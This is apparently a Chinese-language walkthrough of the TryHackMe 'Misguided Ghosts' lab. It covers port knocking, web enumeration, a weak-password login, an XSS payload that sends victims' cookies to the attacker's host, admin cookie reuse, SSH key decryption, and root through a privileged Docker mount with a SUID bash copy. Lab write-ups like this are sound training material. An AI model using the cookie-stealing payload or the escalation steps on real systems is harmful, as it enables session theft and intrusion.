Skip to main content

Misguided Ghosts

困难程度: ⭐⭐ 考察知识点: Docker 提权, Docker 逃逸, XSS, 加密解密

TryHackMe | Misguided Ghosts

端口扫描

root@ip-10-10-227-106:~/misguidedghosts# nmap -sTCV -p- --min-rate 1000 10.10.33.149

Starting Nmap 7.60 ( https://nmap.org ) at 2023-12-03 09:18 GMT
Nmap scan report for ip-10-10-30-71.eu-west-1.compute.internal (10.10.30.71)
Host is up (0.0058s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 ftp      ftp          4096 Aug 28  2020 pub
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.227.106
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d9:91:89:96:af:bc:06:b9:8d:43:df:53:dc:1f:8f:12 (RSA)
|   256 25:0b:be:a2:f9:64:3e:f1:e3:15:e8:23:b8:8c:e5:16 (ECDSA)
|_  256 09:59:9a:84:e6:6f:01:f3:33:8e:48:44:52:49:14:db (EdDSA)
MAC Address: 02:81:75:3F:CC:9B (Unknown)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.80 seconds

21

从端口扫描结果来看我们可以发现其中 FTP 存在匿名访问, 访问之后从其中得到三个文件

root@ip-10-10-227-106:~/misguidedghosts# ls
info.txt  jokes.txt  trace.pcapng
root@ip-10-10-227-106:~/misguidedghosts# cat info.txt 
I have included all the network info you requested, along with some of my favourite jokes.

- Paramore
root@ip-10-10-227-106:~/misguidedghosts# cat jokes.txt 
Taylor: Knock, knock.
Josh:   Who's there?
Taylor: The interrupting cow.
Josh:   The interrupting cow--
Taylor: Moo

Josh:   Knock, knock.
Taylor: Who's there?
Josh:   Adore.
Taylor: Adore who?
Josh:   Adore is between you and I so please open up!

从目前来看这是一个端口敲击的案例, 首先需要根据流量包猜出端口敲击的顺序, 观察流量包后了解到对应的顺序

7864 8273 9241 12007 60753

image-20240709232353927

重新进行端口扫描, 我们可以发现开放了新的端口

root@ip-10-10-141-243:~/misguidedghosts/knock# ./knock 10.10.104.113  7864 8273 9241 12007 60753 
root@ip-10-10-141-243:~/misguidedghosts/knock# nmap -sTCV -p- --min-rate 1000  10.10.104.113

Starting Nmap 7.60 ( https://nmap.org ) at 2023-12-03 11:12 GMT
Nmap scan report for ip-10-10-104-113.eu-west-1.compute.internal (10.10.104.113)
Host is up (0.00060s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 ftp      ftp          4096 Aug 28  2020 pub
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.141.243
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d9:91:89:96:af:bc:06:b9:8d:43:df:53:dc:1f:8f:12 (RSA)
|   256 25:0b:be:a2:f9:64:3e:f1:e3:15:e8:23:b8:8c:e5:16 (ECDSA)
|_  256 09:59:9a:84:e6:6f:01:f3:33:8e:48:44:52:49:14:db (EdDSA)
8080/tcp open  ssl/http Werkzeug httpd 1.0.1 (Python 2.7.18)
|_http-title: Misguided Ghosts
| ssl-cert: Subject: commonName=misguided_ghosts.thm/organizationName=Misguided Ghosts/stateOrProvinceName=Williamson Country/countryName=TN
| Not valid before: 2020-08-11T16:52:11
|_Not valid after:  2021-08-11T16:52:11
MAC Address: 02:CB:67:48:1C:F3 (Unknown)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.74 seconds

8080

访问 8080 端口注意这里需要使用 https

image-20240709232403358

root@ip-10-10-141-243:~/misguidedghosts# gobuster dir -u https://10.10.104.113:8080/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x html,txt -k
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.104.113:8080/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     html,txt
[+] Timeout:        10s
===============================================================
2023/12/03 11:27:15 Starting gobuster
===============================================================
/login (Status: 200)
/dashboard (Status: 302)
/console (Status: 200)

之后需要进行登录但是我们没有账号, 目前来看证书是我们拥有的东西, 查看证书内容可以发现证书的发行者的 email 地址, 猜测用户名为 zac 之后尝试弱密码 zac 发现可以登录

image-20240709232410749

image-20240709232417775

登录之后, 根据提示信息我们直到是时候上 XSS 进行钓鱼了, 经过一系列的尝试我最终创建了如下 payload

<Script>document.location="http://10.10.141.243:8000/?c="+document.cookie;</Script> # 这条规则获取到之后就需要重启靶机了, 有点危害大

image-20240709232424820

之后登录之后, 并没有发现什么内容, 因此我使用管理员账号进行扫描, 发现一个内容, 经过一系列探查后我发现其有点古怪, 存在命令注入漏洞

root@ip-10-10-141-243:~/misguidedghosts# gobuster dir -u https://10.10.61.76:8080/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x html,txt -c 'login=hayley_is_admin' -k
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.61.76:8080/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] Cookies:        login=hayley_is_admin
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     html,txt
[+] Timeout:        10s
===============================================================
2023/12/03 12:52:14 Starting gobuster
===============================================================
/login (Status: 302)
/photos (Status: 200)
/dashboard (Status: 200)
/console (Status: 200)

image-20240709232432136

后渗透

root (172.17.0.2)

在 Docker 中 zac 用户中发现两个文件, 阅读知道其中一个为私钥

image-20240709232447728

我在尝试登陆时发现对应的密钥格式错误, 那么应该是加密了需要进行解密操作, 这里涉及到复杂的解密行为具体我会单独开一张研究 CyberChef

image-20240709232453692

root (172.17.0.2) —> zac(10.10.61.76)

修复 SSH 密钥之后我们就可以直接登录了

image-20240709232521977

zac(10.10.61.76) —> root(10.10.61.76)

在之前 Docker 环境中有一个 start.sh , 我猜测这是容器的启动命令, 所以进行查看发现其以特权方式挂载了 /home/zac/notes 目录这不思路直接就来了

image-20240709232533436

/home/zac/notes 下复制 bash 文件, 之后赋予特权即可

image-20240709232540380

zac@misguided_ghosts:~/notes$ ls -al bash
-rwsr-xr-x 1 root root 1113504 Dec  3 13:40 bash
zac@misguided_ghosts:~/notes$ ./bash -p
bash-4.4# id
uid=1001(zac) gid=1001(zac) euid=0(root) groups=1001(zac)